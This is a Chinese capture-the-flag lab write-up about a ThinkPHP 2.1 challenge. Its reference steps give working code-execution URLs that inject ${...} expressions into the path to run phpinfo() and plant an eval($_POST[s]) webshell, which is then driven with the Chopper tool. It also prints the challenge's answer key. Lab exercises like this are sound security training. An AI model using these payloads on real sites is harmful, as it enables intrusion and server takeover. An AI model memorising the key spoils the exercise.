目录
1:题目背景
ThinkPHP是一个开源的PHP框架,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。早期的思想架构来源于Struts,后来经过不断改进和完善,同时也借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,融合了Struts的Action和Dao思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式,封装了CURD和一些常用操作,单一入口模式等,在模版引擎、缓存机制、认证机制和扩展性方面均有独特的表现。
2:题目描述
一个web系统的index.php源码里有一串key,你需要获取到源码才能通过本关。
3:答案提交
1、提交得到的key。
2、请提交操作过程报告,报告中要包含操作的关键过程描述并附截图,以WORD方式提交。
4: 提交key
Key:thinkphp code execution
5: 关卡环境
VPC1(虚拟PC) | 工具场景:Windows XP操作系统/BT5 |
VPC2(虚拟PC) | Window server xp |
软件描述 | 使用工具场景集成的工具软件,参赛者也可以上传工具软件软件到工具场景。 |
关卡环境描述 | 1、学生机与实验室网络直连 2、VPC与实验室网络直连 3、学生机与VPC物理链路连通 |
6:参考步骤
1.打开浏览器,访问http://192.168.102.62,发现时thinkphp 2.1版本。
2.通过搜索引擎,得知此版本存在代码执行漏洞。Poc为:
index.php/module/action/param1/${@print(THINK_VERSION)}
3.根据poc,构造地址:
http://192.168.102.62/index.php/module/action/param1/%7B$%7Bphpinfo%28%29%7D%7D
4.证明存在漏洞。再构造:
http://192.168.102.62/index.php/module/action/param1/{${eval($_POST[s])}}
使用菜刀连接,如图配置。
5.浏览站点内容。
6.得到key:thinkphp code execution